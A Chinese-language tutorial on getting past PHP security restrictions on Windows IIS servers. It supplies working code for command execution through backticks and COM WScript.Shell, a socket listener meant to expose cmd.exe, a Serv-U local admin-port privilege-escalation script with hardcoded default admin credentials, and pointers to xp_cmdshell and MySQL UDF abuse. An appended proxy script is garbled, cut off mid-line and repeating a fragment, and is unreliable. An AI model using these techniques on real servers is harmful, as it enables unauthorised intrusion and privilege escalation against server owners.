從WIN2000到WIN XP， 再到WIN2003， MS IIS服務(wù)器安全性的提高是顯而易見的。 在WIN2000中， 一個(gè)普通的PHP SHELL便能把它打垮; 在WIN XP， 即使Safe mode = off，你也無法用system() 等函數(shù)執(zhí)行系統(tǒng)命令， 但是我們還能用com()函數(shù)進(jìn)行突破;到WIN 2003，即使IIS 和PHP都是默認(rèn)安裝，你用system()， com()也可能拿它沒轍。這時(shí)候你就不得不使用一些新的方法來進(jìn)行突破了。;1、disable_functions的突破

在php -4.0.1以上的版本，php.ini里引入了一項(xiàng)功能disable_functions ， 這個(gè)功能比較有用，可以用它禁止一些函數(shù)。比如在php.ini里加上disable_functions = passthru exec system popen 那么在執(zhí)行這些函數(shù)的時(shí)候?qū)崾網(wǎng)arning: system() has been disabled for security reasons，同時(shí)程序終止運(yùn)行。但是也不是沒有辦法執(zhí)行系統(tǒng)命令了。因?yàn)閜hp采用了很多perl的特性，比如還可以用(`)來執(zhí)行命令，示例代碼如下：

<?$output = `ls -al`;echo '<pre>$output</pre>';?>

據(jù)說這個(gè)只有設(shè)成safe_mode為on才能避免，但上次我在一臺國外的服務(wù)器上使用的時(shí)候還是失敗了，人并不是什么時(shí)候都能那么走運(yùn)的：）

2、dl()函數(shù)的應(yīng)用

當(dāng)任何PHP的內(nèi)部命令執(zhí)行數(shù)和''都無法使用的時(shí)候，可以嘗試dl()，該方法只能用于safe mode=off， 因?yàn)樗诎踩Ｊ较率潜唤玫摹＠胐l()你可以直接調(diào)用W32api 函數(shù)，可惜這個(gè)擴(kuò)展已被移動到 PECL 庫中，且自PHP 5.1.0以下版本起不再被綁定。以下是手冊里的例子：

// 加載此擴(kuò)展

dl('php_w32api.dll');

// 注冊 GetTickCount 函數(shù)，來自 kernel32.dll

w32api_register_function('kernel32.dll'，

'GetTickCount'，

'long');

// 注冊 MessageBoxA 函數(shù)，來自 User32.dll

w32api_register_function('User32.dll'，

'MessageBoxA'，

'long');

// 取得開機(jī)時(shí)間信息

$ticks = GetTickCount();

// 轉(zhuǎn)換為易于理解的文本

$secs = floor($ticks / 1000);

$mins = floor($secs / 60);

$hours = floor($mins / 60);

$str = sprintf('You have been using your computer for:'.

'rn %d Milliseconds， or rn %d Seconds'.

'or rn %d mins orrn %d hours %d mins.'，

$ticks，

$secs，

$mins，

$hours，

$mins - ($hours*60));

// 顯示一個(gè)消息對話框，只有一個(gè) OK 按鈕和上面的開機(jī)時(shí)間文本

MessageBoxA(NULL，

$str，

'Uptime Information'，

MB_OK);

?>

可惜我還沒有理解透徹dl()和W32api， 所以就不亂舉例子了， 免得誤導(dǎo)讀者。

3、COM 和 .Net(Windows)函數(shù)的應(yīng)用

COM（Component Object Model，組件對象模型）是微軟開發(fā)的軟件規(guī)范，它用于開發(fā)面向?qū)ο蟮?、編譯好的軟件組件，它允許把軟件抽象成為二進(jìn)制的部件，主要運(yùn)用于windows平臺。

PHP 的 Windows 版本已經(jīng)內(nèi)置該擴(kuò)展模塊的支持。無需加載任何附加擴(kuò)展庫即可使用COM函數(shù)。它的使用方法類似于C++或Java中類的創(chuàng)建的語法，并把COM的類名作為參數(shù)傳遞到構(gòu)造函數(shù)。例如使用在PHP中調(diào)用“WScript.Shell”執(zhí)行系統(tǒng)命令：

$cmd=” E:/cert/admin/psexec.exe”;

if($com=new COM('WScript.Shell')) echo 'yes';

if(!$cmd1=$com->exec($cmd))

{

echo 'can not exec()';

}

if(!$cmd2=$cmd1->stdout())

{

echo 'can not stdout()';

}

if(!$cmd3=$cmd2->readall())

{

echo 'can not readall()';

}

echo $cmd3;

?>

圖1是我寫的一個(gè)執(zhí)行psexec.exe的一個(gè)例子。

這段代碼與ASP的的意思是一模一樣的，當(dāng)然，你也可以像ASP那樣調(diào)用“ADODB.Connection”，利用這個(gè)組件結(jié)合jet2溢出漏洞，可能能夠在PHP Saft mode=ON下拿到一個(gè)Shell。

//create the database connection

$conn = new COM('ADODB.Connection');

$dsn = 'DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=' . realpath('mydb.mdb');

$conn->Open($dsn);

//pull the data through SQL string

$rs = $conn->Execute('select clients from web');

…..

?>

.Net 函數(shù)只能運(yùn)行在 PHP 5上，當(dāng)然，它需要 “.Net runtime”的支持，而且這的PHP的一個(gè)實(shí)驗(yàn)性模塊，功能還未齊全，所以在這就不討論了。

4、Java()函數(shù)的應(yīng)用

該方法適用于safe mode=on。要使用JAVA模塊服務(wù)器必須事先安裝Java虛擬機(jī)，而且在PHP安裝配置的時(shí)候打開了with-java的選項(xiàng)，代碼如下：

[JAVA]

;這是到php_java.jar的路徑

;java.class.path = .php_java.jar

;JDK的路徑

;Java.home = f:jdk1.3.0

;到虛擬機(jī)的路徑

;Java.library=f:jdk1.3.0jrebinhostspotjvm.dll

同COM一樣，使用Java創(chuàng)建類（不僅僅是JavaBeans）只需把JAVA的類名作為參數(shù)傳遞到構(gòu)造函數(shù)。以下是手冊里邊的一個(gè)例子：

// This example is only intended to be run as a CGI.

$frame = new Java('java.awt.Frame'， 'PHP');

$button = new Java('java.awt.Button'， 'Hello Java World!');

$frame->add('North'， $button);

$frame->validate();

$frame->pack();

$frame->visible = True;

$thread = new Java('java.lang.Thread');

$thread->sleep(10000);

$frame->dispose();

?>

可惜能真正支持JAVA的PHP服務(wù)器并不多見，所以在這也不多討論了。

5、socket()函數(shù)的應(yīng)用

socket 是PHP中功能極為強(qiáng)大的一個(gè)模塊，如果你使用高級的、抽象的接口（由fsockopen()和psockopen函數(shù)打開的socket），是不需要打開“php_sockets.dll”的。但是如果要使用完整的socket函數(shù)塊，就必須在php.ini這樣設(shè)置：

;Windows Extensions

;Note that MySQL and ODBC support is now built in， so no dll is needed for it.

……..

;去掉以下一句最前邊的分號

;extension=php_sockets.dll

使用PHP的socket函數(shù)塊可以實(shí)現(xiàn)端口轉(zhuǎn)發(fā)/重定向、數(shù)據(jù)包嗅探、本地溢出等功能， nc能做的， 它大部分都能做到。而且， 還可以用它構(gòu)造TCP/UDP服務(wù)器， 同時(shí)， 我覺得它也是突破服務(wù)器安全策略的一個(gè)最好的辦法。以下便是一個(gè)在服務(wù)器上打開端口構(gòu)造TCP服務(wù)器的例子，你可以用它來捆綁上服務(wù)器的cmd.exe：

//在服務(wù)器上構(gòu)造TCP服務(wù)

//該例子需要php_sockets.dll的支持

//執(zhí)行后便可使用” telnet 127.0.0.1 1020”連接

error_reporting(E_ALL);

/* Allow the script to hang around waiting for connections. */

set_time_limit(0);

/* Turn on implicit output flushing so we see what we're getting

* as it comes in. */

ob_implicit_flush();

//在服務(wù)器上綁定IP和端口

$address = '127.0.0.1';

$port = 1020;

if (($sock = socket_create(AF_INET， SOCK_STREAM， SOL_TCP)) < 0) {

echo 'socket_create() failed: reason: ' . socket_strerror($sock) . 'n';

}

if (($ret = socket_bind($sock， $address， $port)) < 0) {

echo 'socket_bind() failed: reason: ' . socket_strerror($ret) . 'n';

}

if (($ret = socket_listen($sock， 5)) < 0) {

echo 'socket_listen() failed: reason: ' . socket_strerror($ret) . 'n';

}

do {

if (($msgsock = socket_accept($sock)) < 0) {

echo 'socket_accept() failed: reason: ' . socket_strerror($msgsock) . 'n';

break;

}

/* Send instructions. */

$msg = 'nWelcome to the PHP Test Server. n' .

'To quit， type 'quit'. To shut down the server type 'shutdown'.n';

socket_write($msgsock， $msg， strlen($msg));

do {

if (false === socket_recv($msgsock， $buf ， 1024， 0)) {

echo 'socket_read() failed: reason: ' . socket_strerror($ret) . 'n';

break 2;

}

if (!$buf = trim($buf)) {

continue;

}

if ($buf == 'quit') {

break;

}

if ($buf == 'shutdown') {

socket_close($msgsock);

break 2;

}

$talkback = 'PHP: You said '$buf'.n';

socket_write($msgsock， $talkback， strlen($talkback));

echo '$bufn';

//以下處理接受到的buf

/*eg：例如

$buf=”cmd.exe /c netstat –an”;

$pp = popen('$buf '， 'r');

While($read = fgets($pp， 2096))

echo $read;

pclose($pp);

*/

} while (true);

socket_close($msgsock);

} while (true);

socket_close($sock);

?>

事實(shí)上，很多主機(jī)都是沒有加載php_sockets.dll的，慶幸的是，不需要socket模塊支持的“fsockopen”函數(shù)已經(jīng)足夠我們使用了。因?yàn)橹灰小癴sockopen”，我們便可以自由地讀寫本機(jī)中未對外部開放的端口。使用fsockopen讀寫serv-u 的本地管理端口43958 (注: 該端口無法在外部連結(jié)) 進(jìn)行提權(quán)便是一個(gè)很典型的例子：

$adminuser=” LocalAdministrator”;

$adminpass=” #l@$ak#.lk;0@P”;

$adminport=” 43958”;

$fp = fsockopen ('127.0.0.1'，$adminport，$errno， $errstr， 8);

if (!$fp) {

echo '$errstr ($errno)

n';

} else {

//可以寫入$shellcode

// fputs ($fp， $shellcode);

fputs ($fp， 'USER '.$adminuser.'rn');

sleep (1);

fputs ($fp， 'PASS '.$adminpass.'rn');

sleep (1);

fputs ($fp， 'SITE MAINTENANCErn');

sleep (1);

fputs ($fp， '-SETUSERSETUPrn');

fputs ($fp， '-IP='.$addr.'rn');

fputs ($fp， '-PortNo='.$ftpport.'rn');

fputs ($fp， '-User='.$user.'rn');

fputs ($fp， '-Password='.$password.'rn');

fputs ($fp， '-HomeDir='.$homedir.'rn');

fputs ($fp， '-LoginMesFile=rn');

fputs ($fp， '-Disable=0rn');

fputs ($fp， '-RelPaths=0rn');

fputs ($fp， '-NeedSecure=0rn');

fputs ($fp， '-HideHidden=0rn');

fputs ($fp， '-AlwaysAllowLogin=0rn');

fputs ($fp， '-ChangePassword=1rn');

fputs ($fp， '-QuotaEnable=0rn');

fputs ($fp， '-MaxUsersLoginPerIP=-1rn');

fputs ($fp， '-SpeedLimitUp=-1rn');

fputs ($fp， '-SpeedLimitDown=-1rn');

fputs ($fp， '-MaxNrUsers=-1rn');

fputs ($fp， '-IdleTimeOut=600rn');

fputs ($fp， '-SessionTimeOut=-1rn');

fputs ($fp， '-Expire=0rn');

fputs ($fp， '-RatioUp=1rn');

fputs ($fp， '-RatioDown=1rn');

fputs ($fp， '-RatiosCredit=0rn');

fputs ($fp， '-QuotaCurrent=0rn');

fputs ($fp， '-QuotaMaximum=0rn');

fputs ($fp， '-Maintenance=Systemrn');

fputs ($fp， '-PasswordType=Regularrn');

fputs ($fp， '-Ratios=Nonern');

fputs ($fp， ' Access='.$homedir.'|RWAMELCDPrn');

fputs ($fp， 'QUITrn');

sleep (1);

while (!feof($fp)) {

echo fgets ($fp，128);

}

}

?>

還可以利用fsockopen編寫HTTP代理，從而訪問外網(wǎng)或本機(jī)中無法外部訪問的網(wǎng)站。我手上有一個(gè)完整的HTTPProxy（圖4），代碼較長。有興趣的讀者可以看看。

6、MYSQL/MSSQL接口

不同于linux的是，windows下的mysql/MSSQL一般是以系統(tǒng)管理員身份運(yùn)行的，因此，只要能拿到本機(jī)SQL數(shù)據(jù)庫中的root/sa密碼，你就可以直接用PHP連接數(shù)據(jù)庫來執(zhí)行系統(tǒng)命令。

在Mysql中執(zhí)行系統(tǒng)命令要利用用戶自定義函數(shù)“MySQL UDF Dynamic Library”這個(gè)漏洞。在MSSQL中只要連接上數(shù)據(jù)庫，就能直接調(diào)用“master..xp_cmdshell“擴(kuò)展執(zhí)行命令，權(quán)限當(dāng)然是system權(quán)限。

總結(jié)一下：由于系統(tǒng)、IIS、PHP的版本不一樣，以上提到的幾個(gè)突破方法可能會有所變化，PHP還有許多擴(kuò)展功能是可以利用的，走出system（）那幾個(gè)系統(tǒng)命令執(zhí)行函數(shù)，你就有可能突破系統(tǒng)安全策略的限制！

后面附上proxy.php的代碼

error_reporting(E_ALL);

/*

// This program is free software; you can redistribute it and/or

// modify it under the terms of the GNU General Public License

// as published by the Free Software Foundation; either version 2

// of the License， or (at your option) any later version.

//

// This program is distributed in the hope that it will be useful，

// but WITHOUT ANY WARRANTY; without even the implied warranty of

// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

// GNU General Public License for more details.

//

// You should have received a copy of the GNU General Public License

// along with this program; if not， write to the Free Software

// Foundation， Inc.， 59 Temple Place - Suite 330， Boston， MA 02111-1307， USA.

//-------------------------------------------------------------------

// Class: PHProxy

// Author: ultimategamer00 (Abdullah A.)

// Last Modified: 6:28 PM 6/22/2004

*/

function __stripslashes($str)

{

return get_magic_quotes_gpc() ? stripslashes($str) : $str;

}

if (!function_exists('str_rot13'))

{

function str_rot13($str)

{

static $alpha = array('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'，

'nopqrstuvwxyzabcdefghijklmNOPQRSTUVWXYZABCDEFGHIJKLM');

return strtr($str， $alpha[0]， $alpha[1]);

}

}

class PHProxy

{

var $allowed_hosts = array();

var $version;

var $script_url;

var $url;

var $url_segments;

var $flags = array('include_form' => 1， 'remove_scripts' => 1， 'accept_cookies' => 1， 'show_images' => 1， 'show_referer' => 1);

var $socket;

var $content_type;

var $request_headers;

var $post_body;

var $response_headers;

var $response_body;

function PHProxy($flags = 'previous')

{

$this->version = '0.2';

$this->script_url = 'http'

. (isset(

function set_request_headers()

{

$headers = ' ' . (isset($this->url_segments['query']) ? '?' : '') . ' HTTP/1.0rn';

$headers .= 'Host: :rn';

$headers .= 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)rn';

$headers .= 'Accept: text/xml，application/xml，application/xhtml+xml，text/html;q=0.9，text/plain;q=0.8，video/x-mng，image/png，image/jpeg，image/gif;q=0.2，*/*;q=0.1rn';

$headers .= 'Connection: closern';

if ($this->flags['show_referer'] == 1)

{

$headers .= 'Referer: rn';

}

$cookies = $this->get_cookies();

$headers .= $cookies != '' ? 'Cookie: $cookiesrn' : '';

if (

function set_request_headers()

{

$headers = ' ' . (isset($this->url_segments['query']) ? '?' : '') . ' HTTP/1.0rn';

$headers .= 'Host: :rn';

$headers .= 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)rn';

$headers .= 'Accept: text/xml，application/xml，application/xhtml+xml，text/html;q=0.9，text/plain;q=0.8，video/x-mng，image/png，image/jpeg，image/gif;q=0.2，*/*;q=0.1rn';

$headers .= 'Connection: closern';

if ($this->flags['show_referer'] == 1)

{

$headers .= 'Referer: rn';

}

$cookies = $this->get_cookies();

$headers .= $cookies != '' ? 'Cookie: $cookiesrn' : '';

if (